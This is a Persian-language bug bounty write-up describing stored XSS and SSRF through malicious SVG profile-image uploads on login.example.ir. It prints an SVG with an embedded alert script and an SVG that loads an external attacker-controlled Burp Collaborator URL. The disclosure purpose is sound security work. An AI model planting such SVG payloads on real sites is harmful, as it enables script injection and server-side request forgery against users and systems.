رایتاپ
SSRF & Stored XSS writeup

این رایتاپ بر اساس سناریوهای دریافت شده از متخصصین امنیتی باگدشت با هدف اشتراک گذاری دانش امنیتی و تسریع در ایمن سازی ارایه شده است.

به دلیل عدم پیکربندی مناسب بر روی کنترل دریافت ورودی‌های کاربر (متن، فایل، و..) امکان بارگذاری فایل مخرب به عنوان تصویر پروفایل در آدرس login.example.ir وجود دارد که می‌تواند منجر به پیاده‌سازی حملات گوناگونی شود.
در سناریو انجام شده، جهت تست دو فایل customize شده با پیلود‌های متفاوت به عنوان تصویر پروفایل آپلود شد که دو حمله SSRF و Stored xss توسط آن‌ها پیاده‌سازی شد.

مراحل بررسی:

XSS:

1.   پس از ورود به حساب کاربری در سامانه login.example.ir، بر روی تصویر پروفایل خود کلیک کرده تا فایل مورد نظر را به عنوان آواتار آپلود نماییم.

2.   ابتدا فایل مخرب حاوی پیلود XSS را انتخاب می‌کنیم و بر روی آن کلیک می‌کنیم.

3.   حال با کلیک راست بر روی تصویر پروفایل خود و کلیک بر روی گزینه‌ی Open image in new tap، پیغام جاواسکریپت در مرورگر نمایش داده می‌شود.

پیلود مورد استفاده در تصویر مربوط به حمله XSS:

 <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("XSS by Jack"); </script> </svg>

SSRF:

حال برای پیاده‌سازی حمله SSRF، فایل مربوطه را آپلود می‌کنیم و مجددا با کلیک بر روی گزینه Open image in new tap، درخواست سرور که به سمت سرور خودمان (مهاجم) آمده است را مشاهده می‌کنیم.

پیلود مورد استفاده در تصویر مربوط به حمله SSRF:

 <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="http://y98ocs4j1ue5ti9xrr58ydade4kv8k.burpcollaborator.net" /></svg>

نکته:

مقدار http://y98ocs4j1ue5ti9xrr58ydade4kv8k.burpcollaborator.net درواقع آدرس سرور مهاجم است که در فایل جایگذاری شده است.

پس از باز کردن تصویر مربوط به حمله SSRF، سرور سامانه آسیب‌پذیر، درخواست‌های خود را به سرور ما ارسال کرده است.

© BugDasht - 2023